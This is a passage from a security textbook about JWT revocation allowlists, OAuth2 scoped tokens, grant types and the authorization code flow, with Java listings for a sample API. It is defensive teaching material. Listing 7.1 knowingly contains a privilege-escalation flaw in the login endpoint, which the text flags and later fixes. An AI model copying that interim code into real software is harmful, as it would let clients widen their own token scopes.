prevent forgeries. Wrapping database tokens in a JWT or other authenticated
token format achieves the same protections.
Less security-critical operations can be performed based on data in the JWT
alone, avoiding a database lookup. For example, you might decide to let a user
see which Natter social spaces they are a member of and how many unread mes-
sages they have in each of them without checking the revocation status of the
token, but require a database check when they actually try to read one of those
or post a new message.
Token attributes can be moved between the JWT and the database depending
on how sensitive they are or how likely they are to change. You might want to
store some basic information about the user in the JWT but store a last activ-
ity time for implementing idle timeouts in the database because it will change
frequently.
DEFINITION
An idle timeout (or inactivity logout) automatically revokes an authen-
tication token if it hasn’t been used for a certain amount of time. This can be
used to automatically log out a user if they have stopped using your API but
have forgotten to log out manually.
Listing 6.10 shows the EncryptedJwtTokenStore updated to list valid tokens in the
database. It does this by taking an instance of the DatabaseTokenStore as a construc-
tor argument and uses that to create a dummy token with no attributes. If you wanted
to move attributes from the JWT to the database, you can do that here by populating
the attributes in the database token and removing them from the JWT token. The
token ID returned from the database is then stored inside the JWT as the standard
JWT ID (jti) claim. Open JwtTokenStore.java in your editor and update it to allowlist
tokens in the database as in the listing.
public class EncryptedJwtTokenStore implements SecureTokenStore {
private final SecretKey encKey;
private final DatabaseTokenStore tokenAllowlist;
public EncryptedJwtTokenStore(SecretKey encKey,
DatabaseTokenStore tokenAllowlist) {
this.encKey = encKey;
this.tokenAllowlist = tokenAllowlist;
}
Listing 6.10
Allowlisting JWTs in the database
Inject a Database-
TokenStore into the
EncryptedJwtToken-
Store to use for the
allowlist.
212
CHAPTER 6
Self-contained tokens and JWTs
@Override
public String create(Request request, Token token) {
var allowlistToken = new Token(token.expiry, token.username);
var jwtId = tokenAllowlist.create(request, allowlistToken);
var claimsBuilder = new JWTClaimsSet.Builder()
.jwtID(jwtId)
.subject(token.username)
.audience("https://localhost:4567")
.expirationTime(Date.from(token.expiry));
token.attributes.forEach(claimsBuilder::claim);
var header = new JWEHeader(JWEAlgorithm.DIR,
EncryptionMethod.A128CBC_HS256);
var jwt = new EncryptedJWT(header, claimsBuilder.build());
try {
var encryptor = new DirectEncrypter(encKey);
jwt.encrypt(encryptor);
} catch (JOSEException e) {
throw new RuntimeException(e);
}
return jwt.serialize();
}
To revoke a JWT, you then simply delete it from the database token store, as shown in
listing 6.11. Parse and decrypt the JWT as before, which will validate the authentica-
tion tag, and then extract the JWT ID and revoke it from the database. This will
remove the corresponding record from the database. While you still have the Jwt-
TokenStore.java open in your editor, add the implementation of the revoke method
from the listing.
@Override
public void revoke(Request request, String tokenId) {
try {
var jwt = EncryptedJWT.parse(tokenId);
var decryptor = new DirectDecrypter(encKey);
jwt.decrypt(decryptor);
var claims = jwt.getJWTClaimsSet();
tokenAllowlist.revoke(request, claims.getJWTID());
} catch (ParseException | JOSEException e) {
throw new IllegalArgumentException("invalid token", e);
}
}
The final part of the solution is to check that the allowlist token hasn’t been revoked
when reading a JWT token. As before, parse and decrypt the JWT using the decryption
Listing 6.11
Revoking a JWT in the database allowlist
Save a copy of
the token in the
database but
remove all the
attributes to
save space.
Save the
database token
ID in the JWT
as the JWT ID
claim.
Parse, decrypt,
and validate the
JWT using the
decryption key.
Extract the JWT ID
and revoke it from
the Database-
TokenStore
allowlist.
213
Summary
key. Then extract the JWT ID and perform a lookup in the DatabaseTokenStore. If
the entry exists in the database, then the token is still valid, and you can continue vali-
dating the other JWT claims as before. But if the database returns an empty result,
then the token has been revoked and so it is invalid. Update the read() method in
JwtTokenStore.java to implement this addition check, as shown in listing 6.12. If you
moved some attributes into the database, then you could also copy them to the token
result in this case.
var jwt = EncryptedJWT.parse(tokenId);
var decryptor = new DirectDecrypter(encKey);
jwt.decrypt(decryptor);
var claims = jwt.getJWTClaimsSet();
var jwtId = claims.getJWTID();
if (tokenAllowlist.read(request, jwtId).isEmpty()) {
return Optional.empty();
}
// Validate other JWT claims
Answers to pop quiz questions
1
a and b. HMAC prevents an attacker from creating bogus authentication tokens
(spoofing) or tampering with existing ones.
2
e. The aud (audience) claim lists the servers that a JWT is intended to be used
by. It is crucial that your API rejects any JWT that isn’t intended for that service.
3
False. The algorithm header can’t be trusted and should be ignored. You should
associate the algorithm with each key instead.
4
a, b, and d. Authenticated encryption includes a MAC so protects against spoof-
ing and tampering threats just like HMAC. In addition, these algorithms pro-
tect confidential data from information disclosure threats.
5
d. The IV (or nonce) ensures that every ciphertext is different.
6
True. IVs should be randomly generated. Although some algorithms allow a
simple counter, these are very hard to synchronize between API servers and
reuse can be catastrophic to security.
Summary
Token state can be stored on the client by encoding it in JSON and applying
HMAC authentication to prevent tampering.
Sensitive token attributes can be protected with encryption, and efficient authen-
ticated encryption algorithms can remove the need for a separate HMAC step.
The JWT and JOSE specifications provide a standard format for authenticated
and encrypted tokens but have historically been vulnerable to several serious
attacks.
Listing 6.12
Checking if a JWT has been revoked
Parse and decrypt
the JWT.
Check if the JWT ID
still exists in the
database allowlist.
If not, then the token is invalid;
otherwise, proceed with
validating other JWT claims.
214
CHAPTER 6
Self-contained tokens and JWTs
When used carefully, JWT can be an effective part of your API authentication
strategy but you should avoid the more error-prone parts of the standard.
Revocation of stateless JWTs can be achieved by maintaining an allowlist or
blocklist of tokens in the database. An allowlisting strategy is a secure default
offering advantages over both pure stateless tokens and unauthenticated data-
base tokens.
Part 3
Authorization
Now that you know how to identify the users of your APIs, you need to
decide what they should do. In this part, you’ll take a deep dive into authoriza-
tion techniques for making those crucial access control decisions.
Chapter 7 starts by taking a look at delegated authorization with OAuth2. In
this chapter, you’ll learn the difference between discretionary and mandatory
access control and how to protect APIs with OAuth2 scopes.
Chapter 8 looks at approaches to access control based on the identity of the
user accessing an API. The techniques in this chapter provide more flexible
alternatives to the access control lists developed in chapter 3. Role-based access
control groups permissions into logical roles to simplify access management,
while attribute-based access control uses powerful rule-based policy engines to
enforce complex policies.
Chapter 9 discusses a completely different approach to access control, in
which the identity of the user plays no part in what they can access. Capability-
based access control is based on individual keys with fine-grained permissions.
In this chapter, you’ll see how a capability-based model fits with RESTful API
design principles and examine the trade-offs compared to other authorization
approaches. You’ll also learn about macaroons, an exciting new token format
that allows broadly-scoped access tokens to be converted on-the-fly into more
restricted capabilities with some unique abilities.
217
OAuth2 and
OpenID Connect
In the last few chapters, you’ve implemented user authentication methods that are
suitable for the Natter UI and your own desktop and mobile apps. Increasingly,
APIs are being opened to third-party apps and clients from other businesses and
organizations. Natter is no different, and your newly appointed CEO has decided
that you can boost growth by encouraging an ecosystem of Natter API clients and
services. In this chapter, you’ll integrate an OAuth2 Authorization Server (AS) to
allow your users to delegate access to third-party clients. By using scoped tokens,
users can restrict which parts of the API those clients can access. Finally, you’ll see
how OAuth provides a standard way to centralize token-based authentication within
This chapter covers
Enabling third-party access to your API with
scoped tokens
Integrating an OAuth2 Authorization Server for
delegated authorization
Validating OAuth2 access tokens with token
introspection
Implementing single sign-on with OAuth and
OpenID Connect
218
CHAPTER 7
OAuth2 and OpenID Connect
your organization to achieve single sign-on across different APIs and services. The
OpenID Connect standard builds on top of OAuth2 to provide a more complete authen-
tication framework when you need finer control over how a user is authenticated.
In this chapter, you’ll learn how to obtain a token from an AS to access an API, and
how to validate those tokens in your API, using the Natter API as an example. You
won’t learn how to write your own AS, because this is beyond the scope of this book.
Using OAuth2 to authorize service-to-service calls is covered in chapter 11.
LEARN ABOUT IT
See OAuth2 in Action by Justin Richer and Antonio Sanso
(Manning, 2017; https://www.manning.com/books/oauth-2-in-action) if you
want to learn how an AS works in detail.
Because all the mechanisms described in this chapter are standards, the patterns will
work with any standards-compliant AS with few changes. See appendix A for details of
how to install and configure an AS for use in this chapter.
7.1
Scoped tokens
In the bad old days, if you wanted to use a third-party app or service to access your
email or bank account, you had little choice but to give them your username and pass-
word and hope they didn’t misuse them. Unfortunately, some services did misuse
those credentials. Even the ones that were trustworthy would have to store your pass-
word in a recoverable form to be able to use it, making potential compromise much
more likely, as you learned in chapter 3. Token-based authentication provides a solu-
tion to this problem by allowing you to generate a long-lived token that you can give
to the third-party service instead of your password. The service can then use the token
to act on your behalf. When you stop using the service, you can revoke the token to
prevent any further access.
Though using a token means that you don’t need to give the third-party your pass-
word, the tokens you’ve used so far still grant full access to APIs as if you were perform-
ing actions yourself. The third-party service can use the token to do anything that you
can do. But you may not trust a third-party to have full access, and only want to grant
them partial access. When I ran my own business, I briefly used a third-party service to
read transactions from my business bank account and import them into the accounting
software I used. Although that service needed only read access to recent transactions, in
practice it had full access to my account and could have transferred funds, cancelled
payments, and performed many other actions. I stopped using the service and went
back to manually entering transactions because the risk was too great.1
The solution to these issues is to restrict the API operations that can be performed
with a token, allowing it to be used only within a well-defined scope. For example, you
might let your accounting software read transactions that have occurred within the
1 In some countries, banks are being required to provide secure API access to transactions and payment services
to third-party apps and services. The UK’s Open Banking initiative and the European Payment Services Direc-
tive 2 (PSD2) regulations are examples, both of which mandate the use of OAuth2.
219
Scoped tokens
last 30 days, but not let it view or create new payments on the account. The scope of
the access you’ve granted to the accounting software is therefore limited to read-only
access to recent transactions. Typically, the scope of a token is represented as one or
more string labels stored as an attribute of the token. For example, you might use the
scope label transactions:read to allow read-access to transactions, and payment
:create to allow setting up a new payment from an account. Because there may be
more than one scope label associated with a token, they are often referred to as
scopes. The scopes (labels) of a token collectively define the scope of access it grants.
Figure 7.1 shows some of the scope labels available when creating a personal access
token on GitHub.
DEFINITION
A scoped token limits the operations that can be performed with
that token. The set of operations that are allowed is known as the scope of the
token. The scope of a token is specified by one or more scope labels, which
are often referred to collectively as scopes.
Scopes control access to
different sections of the API.
The user can add a note
to remember why they
created this token.
GitHub supports hierarchical
scopes, allowing the user to
easily grant related scopes.
Figure 7.1
GitHub allows users to manually create scoped tokens, which they call
personal access tokens. The tokens never expire but can be restricted to only allow
access to parts of the GitHub API by setting the scope of the token.
220
CHAPTER 7
OAuth2 and OpenID Connect
7.1.1
Adding scoped tokens to Natter
Adapting the existing login endpoint to issue scoped tokens is very simple, as shown in
listing 7.1. When a login request is received, if it contains a scope parameter then you
can associate that scope with the token by storing it in the token attributes. You can
define a default set of scopes to grant if the scope parameter is not specified. Open
the TokenController.java file in your editor and update the login method to add sup-
port for scoped tokens, as in listing 7.1. At the top of the file, add a new constant list-
ing all the scopes. In Natter, you’ll use scopes corresponding to each API operation:
private static final String DEFAULT_SCOPES =
"create_space post_message read_message list_messages " +
"delete_message add_member";
WARNING
There is a potential privilege escalation issue to be aware of in this
code. A client that is given a scoped token can call this endpoint to exchange
it for one with more scopes. You’ll fix that shortly by adding a new access con-
trol rule for the login endpoint to prevent this.
public JSONObject login(Request request, Response response) {
String subject = request.attribute("subject");
var expiry = Instant.now().plus(10, ChronoUnit.MINUTES);
var token = new TokenStore.Token(expiry, subject);
var scope = request.queryParamOrDefault("scope", DEFAULT_SCOPES);
token.attributes.put("scope", scope);
var tokenId = tokenStore.create(request, token);
response.status(201);
return new JSONObject()
.put("token", tokenId);
}
To enforce the scope restrictions on a token, you can add a new access control filter
that ensures that the token used to authorize a request to the API has the required
scope for the operation being performed. This filter looks a lot like the existing per-
mission filter that you added in chapter 3 and is shown in listing 7.2. (I’ll discuss the
differences between scopes and permissions in the next section.) To verify the scope,
you need to perform several checks:
First, check if the HTTP method of the request matches the method that this
rule is for, so that you don’t apply a scope for a POST request to a DELETE
request or vice versa. This is needed because Spark’s filters are matched only by
the path and not the request method.
You can then look up the scope associated with the token that authorized the
current request from the scope attribute of the request. This works because
Listing 7.1
Issuing scoped tokens
Store the scope in the token
attributes, defaulting to all
scopes if not specified.
221
Scoped tokens
the token validation code you wrote in chapter 4 copies any attributes from the
token into the request, so the scope attribute will be copied across too.
If there is no scope attribute, then the user directly authenticated the request
with Basic authentication. In this case, you can skip the scope check and let the
request proceed. Any client with access to the user’s password would be able to
issue themselves a token with any scope.
Finally, you can verify that the scope of the token matches the required scope
for this request, and if it doesn’t, then you should return a 403 Forbidden error.
The Bearer authentication scheme has a dedicated error code insufficient_
scope to indicate that the caller needs a token with a different scope, so you can
indicate that in the WWW-Authenticate header.
Open TokenController.java in your editor again and add the requireScope method
from the listing.
public Filter requireScope(String method, String requiredScope) {
return (request, response) -> {
if (!method.equalsIgnoreCase(request.requestMethod()))
return;
var tokenScope = request.<String>attribute("scope");
if (tokenScope == null) return;
if (!Set.of(tokenScope.split(" "))
.contains(requiredScope)) {
response.header("WWW-Authenticate",
"Bearer error=\"insufficient_scope\"," +
"scope=\"" + requiredScope + "\"");
halt(403);
}
};
}
You can now use this method to enforce which scope is required to perform certain
operations, as shown in listing 7.3. Deciding what scopes should be used by your API,
and exactly which scope should be required for which operations is a complex topic,
discussed in more detail in the next section. For this example, you can use fine-
grained scopes corresponding to each API operation: create_space, post_message, and
so on. To avoid privilege escalation, you should require a specific scope to call the
login endpoint, because this can be used to obtain a token with any scope, effectively
bypassing the scope checks.2 On the other hand, revoking a token by calling the logout
Listing 7.2
Checking required scopes
2 An alternative way to eliminate this risk is to ensure that any newly issued token contains only scopes that are
in the token used to call the login endpoint. I’ll leave this as an exercise.
If the HTTP method doesn’t
match, then ignore this rule.
If the token
is unscoped,
then allow all
operations.
If the token scope
doesn’t contain
the required
scope, then return
a 403 Forbidden
response.
222
CHAPTER 7
OAuth2 and OpenID Connect
endpoint should not require any scope. Open the Main.java file in your editor and
add scope checks using the tokenController.requireScope method as shown in list-
ing 7.3.
before("/sessions", userController::requireAuthentication);
before("/sessions",
tokenController.requireScope("POST", "full_access"));
post("/sessions", tokenController::login);
delete("/sessions", tokenController::logout);
before("/spaces", userController::requireAuthentication);
before("/spaces",
tokenController.requireScope("POST", "create_space"));
post("/spaces", spaceController::createSpace);
before("/spaces/*/messages",
tokenController.requireScope("POST", "post_message"));
before("/spaces/:spaceId/messages",
userController.requirePermission("POST", "w"));
post("/spaces/:spaceId/messages", spaceController::postMessage);
before("/spaces/*/messages/*",
tokenController.requireScope("GET", "read_message"));
before("/spaces/:spaceId/messages/*",
userController.requirePermission("GET", "r"));
get("/spaces/:spaceId/messages/:msgId",
spaceController::readMessage);
before("/spaces/*/messages",
tokenController.requireScope("GET", "list_messages"));
before("/spaces/:spaceId/messages",
userController.requirePermission("GET", "r"));
get("/spaces/:spaceId/messages", spaceController::findMessages);
before("/spaces/*/members",
tokenController.requireScope("POST", "add_member"));
before("/spaces/:spaceId/members",
userController.requirePermission("POST", "rwd"));
post("/spaces/:spaceId/members", spaceController::addMember);
before("/spaces/*/messages/*",
tokenController.requireScope("DELETE", "delete_message"));
before("/spaces/:spaceId/messages/*",
userController.requirePermission("DELETE", "d"));
delete("/spaces/:spaceId/messages/:msgId",
moderatorController::deletePost);
Listing 7.3
Enforcing scopes for operations
Ensure that obtaining a scoped token
itself requires a restricted scope.
Revoking a token
should not require
any scope.
Add scope
requirements
to each
operation
exposed by
the API.
223
Scoped tokens
7.1.2
The difference between scopes and permissions
At first glance, it may seem that scopes and permissions are very similar, but there is a
distinction in what they are used for, as shown in figure 7.2. Typically, an API is owned
and operated by a central authority such as a company or an organization. Who can
access the API and what they are allowed to do is controlled entirely by the central
authority. This is an example of mandatory access control, because the users have no con-
trol over their own permissions or those of other users. On the other hand, when a
user delegates some of their access to a third-party app or service, that is known as dis-
cretionary access control, because it’s up to the user how much of their access to grant to
the third party. OAuth scopes are fundamentally about discretionary access control,
while traditional permissions (which you implemented using ACLs in chapter 3) can
be used for mandatory access control.
DEFINITION
With mandatory access control (MAC), user permissions are set and
enforced by a central authority and cannot be granted by users themselves.
With discretionary access control (DAC), users can delegate some of their permis-
sions to other users. OAuth2 allows discretionary access control, also known
as delegated authorization.
Whereas scopes are used for delegation, permissions may be used for either manda-
tory or discretionary access. File permissions in UNIX and most other popular operat-
ing systems can be set by the owner of the file to grant access to other users and so
implement DAC. In contrast, some operating systems used by the military and govern-
ments have mandatory access controls that prevent somebody with only SECRET
clearance from reading TOP SECRET documents, for example, regardless of whether
the owner of the file wants to grant them access.3 Methods for organizing and enforcing
3 Projects such as SELinux (https://selinuxproject.org/page/Main_Page) and AppArmor (https://apparmor
.net/) bring mandatory access controls to Linux.
Authority
User
Grant
permission
Delegate with
scope
Third-party app
Permissions are granted to
users by a central authority
that owns the API.
API
Owns
Users can delegate some of
their access to third parties,
using scopes to restrict the
delegated access.
Figure 7.2
Permissions are
typically granted by a central
authority that owns the API
being accessed. A user does not
get to choose or change their
own permissions. Scopes allow
a user to delegate part of their
authority to a third-party app,
restricting how much access
they grant using scopes.
224
CHAPTER 7
OAuth2 and OpenID Connect
permissions for MAC are covered in chapter 8. OAuth scopes provide a way to layer
DAC on top of an existing MAC security layer.
Putting the theoretical distinction between MAC and DAC to one side, the more
practical distinction between scopes and permissions relates to how they are designed.
The administrator of an API designs permissions to reflect the security goals for the sys-
tem. These permissions reflect organizational policies. For example, an employee doing
one job might have read and write access to all documents on a shared drive. Permis-
sions should be designed based on access control decisions that an administrator may
want to make for individual users, while scopes should be designed based on anticipat-
ing how users may want to delegate their access to third-party apps and services.
NOTE
The delegated authorization in OAuth is about users delegating their
authority to clients, such as mobile apps. The User Managed Access (UMA)
extension of OAuth2 allows users to delegate access to other users.
An example of this distinction can be seen in the design of OAuth scopes used by
Google for access to their Google Cloud Platform services. Services that deal with sys-
tem administration jobs, such as the Key Management Service for handling cryp-
tographic keys, only have a single scope that grants access to that entire API. Access to
individual keys is managed through permissions instead. But APIs that provide access
to individual user data, such as the Fitness API (http://mng.bz/EEDJ) are broken
down into much more fine-grained scopes, allowing users to choose exactly which
health statistics they wish to share with third parties, as shown in figure 7.3. Providing
users with fine-grained control when sharing their data is a key part of a modern pri-
vacy and consent strategy and may be required in some cases by legislation such as the
EU General Data Protection Regulation (GDPR).
Another distinction between scopes and permissions is that scopes typically only
identify the set of API operations that can be performed, while permissions also iden-
tify the specific objects that can be accessed. For example, a client may be granted a
list_files scope that allows it to call an API operation to list files on a shared drive,
but the set of files returned may differ depending on the permissions of the user that
authorized the token. This distinction is not fundamental, but reflects the fact that
scopes are often added to an API as an additional layer on top of an existing permis-
sion system and are checked based on basic information in the HTTP request without
knowledge of the individual data objects that will be operated on.
When choosing which scopes to expose in your API, you should consider what
level of control your users are likely to need when delegating access. There is no
simple answer to this question, and scope design typically requires several iterations
of collaboration between security architects, user experience designers, and user
representatives.
LEARN ABOUT IT
Some general strategies for scope design and documentation
are provided in The Design of Web APIs by Arnaud Lauret (Manning, 2019;
https://www.manning.com/books/the-design-of-web-apis).
225
Scoped tokens
Pop quiz
1
Which of the following are typical differences between scopes and permissions?
a
Scopes are more fine-grained than permissions.
b
Scopes are more coarse-grained than permissions.
c
Scopes use longer names than permissions.
d
Permissions are often set by a central authority, while scopes are designed for
delegating access.
e
Scopes typically only restrict the API operations that can be called. Permis-
sions also restrict which objects can be accessed.
The answer is at the end of the chapter.
System APIs use only coarse-grained
scopes to allow access to the entire API
APIs processing user data provide
more fine-grained scopes to allow
users to control what they share.
Figure 7.3
Google Cloud Platform OAuth scopes are very coarse-grained for system APIs such as
database access or key management. For APIs that process user data, such as the Fitness API, many
more scopes are defined, allowing users greater control over what they share with third-party apps
and services.
226
CHAPTER 7
OAuth2 and OpenID Connect
7.2
Introducing OAuth2
Although allowing your users to manually create scoped tokens for third-party applica-
tions is an improvement over sharing unscoped tokens or user credentials, it can be
confusing and error-prone. A user may not know which scopes are required for that
application to function and so may create a token with too few scopes, or perhaps del-
egate all scopes just to get the application to work.
A better solution is for the application to request the scopes that it requires, and
then the API can ask the user if they consent. This is the approach taken by the
OAuth2 delegated authorization protocol, as shown in figure 7.4. Because an organi-
zation may have many APIs, OAuth introduces the notion of an Authorization Server
(AS), which acts as a central service for managing user authentication and consent
and issuing tokens. As you’ll see later in this chapter, this centralization provides sig-
nificant advantages even if your API has no third-party clients, which is one reason
why OAuth2 has become so popular as a standard for API security. The tokens that an
application uses to access an API are known as access tokens in OAuth2, to distinguish
them from other sorts of tokens that you’ll learn about later in this chapter.
DEFINITION
An access token is a token issued by an OAuth2 authorization
server to allow a client to access an API.
API
Authorization
server
Request scope
Use access token
Consent
Third-party app
Before a third-party client
can use an API, it must
first obtain an access token.
The Authorization Server
checks that the user
consents to this access.
Access token
The app tells the AS
what scope of access
it requires.
Figure 7.4
To access an API using OAuth2, an app must first obtain an
access token from the Authorization Server (AS). The app tells the AS what
scope of access it requires. The AS verifies that the user consents to this
access and issues an access token to the app. The app can then use the
access token to access the API on the user’s behalf.
227
Introducing OAuth2
OAuth uses specific terms to refer to the four entities shown in figure 7.4, based on
the role they play in the interaction:
The authorization server (AS) authenticates the user and issues tokens to clients.
The user is known as the resource owner (RO), because it’s typically their resources
(documents, photos, and so on) that the third-party app is trying to access. This
term is not always accurate, but it has stuck now.
The third-party app or service is known as the client.
The API that hosts the user’s resources is known as the resource server (RS).
7.2.1
Types of clients
Before a client can ask for an access token it must first register with the AS and obtain
a unique client ID. This can either be done manually by a system administrator, or
there is a standard to allow clients to dynamically register with an AS (https://tools.ietf
.org/html/rfc7591).
LEARN ABOUT IT
OAuth2 in Action by Justin Richer and Antonio Sanso (Manning,
2017; https://www.manning.com/books/oauth-2-in-action) covers dynamic cli-
ent registration in more detail.
There are two different types of clients:
Public clients are applications that run entirely within a user’s own device, such as
a mobile app or JavaScript client running in a browser. The client is completely
under the user’s control.
Confidential clients run in a protected web server or other secure location that is
not under a user’s direct control.
The main difference between the two is that a confidential client can have its own client
credentials that it uses to authenticate to the authorization server. This ensures that an
attacker cannot impersonate a legitimate client to try to obtain an access token from a
user in a phishing attack. A mobile or browser-based application cannot keep credentials
secret because any user that downloads the application could extract them.4 For public
clients, alternative measures are used to protect against these attacks, as you’ll see shortly.
DEFINITION
A confidential client uses client credentials to authenticate to the
AS. Usually, this is a long random password known as a client secret, but more
secure forms of authentication can be used, including JWTs and TLS client
certificates.
Each client can typically be configured with the set of scopes that it can ask a user for.
This allows an administrator to prevent untrusted apps from even asking for some
scopes if they allow privileged access. For example, a bank might allow most clients
4 A possible solution to this is to dynamically register each individual instance of the application as a new client
when it starts up so that each gets its own unique credentials. See chapter 12 of OAuth2 in Action (Manning,
2017) for details.
228
CHAPTER 7
OAuth2 and OpenID Connect
read-only access to a user’s recent transactions but require more extensive validation
of the app’s developer before the app can initiate payments.
7.2.2
Authorization grants
To obtain an access token, the client must first obtain consent from the user in the
form of an authorization grant with appropriate scopes. The client then presents this
grant to the AS’s token endpoint to obtain an access token. OAuth2 supports many dif-
ferent authorization grant types to support different kinds of clients:
The Resource Owner Password Credentials (ROPC) grant is the simplest, in which
the user supplies their username and password to the client, which then sends
them directly to the AS to obtain an access token with any scope it wants. This is
almost identical to the token login endpoint you developed in previous chap-
ters and is not recommended for third-party clients because the user directly
shares their password with the app—the very thing you were trying to avoid!
CAUTION
ROPC can be useful for testing but should be avoided in most cases.
It may be deprecated in future versions of the standard.
In the Authorization Code grant, the client first uses a web browser to navigate to a
dedicated authorization endpoint on the AS, indicating which scopes it requires.
The AS then authenticates the user directly in the browser and asks for consent
for the client access. If the user agrees then the AS generates an authorization
code and gives it to the client to exchange for an access token at the token end-
point. The authorization code grant is covered in more detail in the next section.
The Client Credentials grant allows the client to obtain an access token using its
own credentials, with no user involved at all. This grant can be useful in some
microservice communications patterns discussed in chapter 11.
There are several additional grant types for more specific situations, such as the
device authorization grant (also known as device flow) for devices without any
direct means of user interaction. There is no registry of defined grant types, but
websites such as https://oauth.net/2/grant-types/ list the most commonly used
types. The device authorization grant is covered in chapter 13. OAuth2 grants
are extensible, so new grant types can be added when one of the existing grants
doesn’t fit.
What about the implicit grant?
The original definition of OAuth2 included a variation on the authorization code grant
known as the implicit grant. In this grant, the AS returned an access token directly
from the authorization endpoint, so that the client didn’t need to call the token end-
point to exchange a code. This was allowed because when OAuth2 was standardized
in 2012, CORS had not yet been finalized, so a browser-based client such as a single-
page app could not make a cross-origin call to the token endpoint. In the implicit
grant, the AS redirects back from the authorization endpoint to a URI controlled by
229
Introducing OAuth2
An example of obtaining an access token using the ROPC grant type is as follows, as
this is the simplest grant type. The client specifies the grant type (password in this
case), it’s client ID (for a public client), and the scope it’s requesting as POST param-
eters in the application/x-www-form-urlencoded format used by HTML forms. It
also sends the resource owner’s username and password in the same way. The AS will
authenticate the RO using the supplied credentials and, if successful, will return an
access token in a JSON response. The response also contains metadata about the
token, such as how long it’s valid for (in seconds).
$ curl -d 'grant_type=password&client_id=test
➥ &scope=read_messages+post_message
➥ &username=demo&password=changeit'
➥ https://as.example.com:8443/oauth2/access_token
{
"access_token":"I4d9xuSQABWthy71it8UaRNM2JA",
"scope":"post_message read_messages",
"token_type":"Bearer",
"expires_in":3599}
7.2.3
Discovering OAuth2 endpoints
The OAuth2 standards don’t define specific paths for the token and authorization
endpoints, so these can vary from AS to AS. As extensions have been added to OAuth,
several other endpoints have been added, along with several settings for new features.
To avoid each client having to hard-code the locations of these endpoints, there is a
standard way to discover these settings using a service discovery document published
under a well-known location. Originally developed for the OpenID Connect profile of
OAuth (which is covered later in this chapter), it has been adopted by OAuth2
(https://tools.ietf.org/html/rfc8414).
A conforming AS is required to publish a JSON document under the path /.well-
known/oauth-authorization-server under the root of its web server.5 This JSON docu-
ment contains the locations of the token and authorization endpoints and other set-
tings. For example, if your AS is hosted as https:/ /as.example.com:8443, then a GET
the client, with the access token included in the fragment component of the URI. This
introduces some security weaknesses compared to the authorization code grant, as
the access token may be stolen by other scripts running in the browser or leak
through the browser history and other mechanisms. Since CORS is now widely sup-
ported by browsers, there is no need to use the implicit grant any longer and the
OAuth Security Best Common Practice document (https://tools.ietf.org/html/draft-
ietf-oauth-security-topics) now advises against its use.
5 AS software that supports the OpenID Connect standard may use the path /.well-known/openid-configura-
tion instead. It is recommended to check both locations.
Specify the grant type,
client ID, and requested
scope as POST form fields.
The RO’s username and
password are also sent
as form fields.
The access token is returned
in a JSON response, along
with its metadata.
230
CHAPTER 7
OAuth2 and OpenID Connect
request to https:/ /as.example.com:8443/.well-known/oauth-authorization-server returns
a JSON document like the following:
{
"authorization_endpoint":
"http://openam.example.com:8080/oauth2/authorize",
"token_endpoint":
"http://openam.example.com:8080/oauth2/access_token",
…
}
WARNING
Because the client will send credentials and access tokens to many of
these endpoints, it’s critical that they are discovered from a trustworthy source.
Only retrieve the discovery document over HTTPS from a trusted URL.
7.3
The Authorization Code grant
Though OAuth2 supports many different authorization grant types, by far the most
useful and secure choice for most clients is the authorization code grant. With the
implicit grant now discouraged, the authorization code grant is the preferred way for
almost all client types to obtain an access token, including the following:
Server-side clients, such as traditional web applications or other APIs. A server-
side application should be a confidential client with credentials to authenticate
to the AS.
Client-side JavaScript applications that run in the browser, such as single-page
apps. A client-side application is always a public client because it has no secure
place to store a client secret.
Mobile, desktop, and command-line applications. As for client-side applica-
tions, these should be public clients, because any secret embedded into the
application can be extracted by a user.
Pop quiz
2
Which two of the standard OAuth grants are now discouraged?
a
The implicit grant
b
The authorization code grant
c
The device authorization grant
d
Hugh Grant
e
The Resource Owner Password Credentials (ROPC) grant
3
Which type of client should be used for a mobile app?
a
A public client
b
A confidential client
The answers are at the end of the chapter.
231
The Authorization Code grant
In the authorization code grant, the client first redirects the user’s web browser to the
authorization endpoint at the AS, as shown in figure 7.5. The client includes its client
ID and the scope it’s requesting from the AS in this redirect. Set the response_type
parameter in the query to code to request an authorization code (other settings such
Browser
Authorization
server
Client
Resource owner
1. Redirect to
authorize endpoint
2. Authenticate RO
and ask for consent
First, the client
redirects the user’s
browser to the AS’s
authorize endpoint.
The AS then authenticates
the user (RO) and asks
for consent.
The client includes its
client ID and requested
scope in the request.
Browser
Authorization
server
Client
Resource owner
3. Redirects to client
with auth code
4. Auth code
5. Exchange code
for access token
The AS creates an authorization
code and redirects to the client.
The client then calls the AS
token endpoint to exchange
the authorization code for
an access token.
Resource server
(API)
The client can then use
the access token to
access the API.
Access token
Client
Figure 7.5
In the Authorization Code grant, the client first redirects the user’s web browser
to the authorization endpoint for the AS. The AS then authenticates the user and asks for
consent to grant access to the application. If approved, then the AS redirects the web browser
to a URI controlled by the client, including an authorization code. The client can then call the
AS token endpoint to exchange the authorization code for an access token to use to access
the API on the user’s behalf.
232
CHAPTER 7
OAuth2 and OpenID Connect
as token are used for the implicit grant). Finally, the client should generate a unique
random state value for each request and store it locally (such as in a browser cookie).
When the AS redirects back to the client with the authorization code it will include
the same state parameter, and the client should check that it matches the original
one sent on the request. This ensures that the code received by the client is the one it
requested. Otherwise, an attacker may be able to craft a link that calls the client’s
redirect endpoint directly with an authorization code obtained by the attacker. This
attack is like the Login CSRF attacks discussed in chapter 4, and the state parameter
plays a similar role to an anti-CSRF token in that case. Finally, the client should
include the URI that it wants the AS to redirect to with the authorization code. Typ-
ically, the AS will require the client’s redirect URI to be pre-registered to prevent
open redirect attacks.
DEFINITION
An open redirect vulnerability is when a server can be tricked into
redirecting a web browser to a URI under the attacker’s control. This can be
used for phishing because it initially looks like the user is going to a trusted
site, only to be redirected to the attacker. You should require all redirect URIs
to be pre-registered by trusted clients rather than redirecting to any URI pro-
vided in a request.
For a web application, this is simply a case of returning an HTTP redirect status code
such as 303 See Other,6 with the URI for the authorization endpoint in the Location
header, as in the following example:
HTTP/1.1 303 See Other
Location: https://as.example.com/authorize?client_id=test
➥ &scope=read_messages+post_message
➥ &state=t9kWoBWsYjbsNwY0ACJj0A
➥ &response_type=code
➥ &redirect_uri=https://client.example.net/callback
For mobile and desktop applications, the client should launch the system web browser
to carry out the authorization. The latest best practice advice for native applications
(https://tools.ietf.org/html/rfc8252) recommends that the system browser be used
for this, rather than embedding an HTML view within the application. This avoids
users having to type their credentials into a UI under the control of a third-party app
and allows users to reuse any cookies or other session tokens they may already have in
the system browser for the AS to avoid having to login again. Both Android and iOS
support using the system browser without leaving the current application, providing a
similar user experience to using an embedded web view.
6 The older 302 Found status code is also often used, and there is little difference between them.
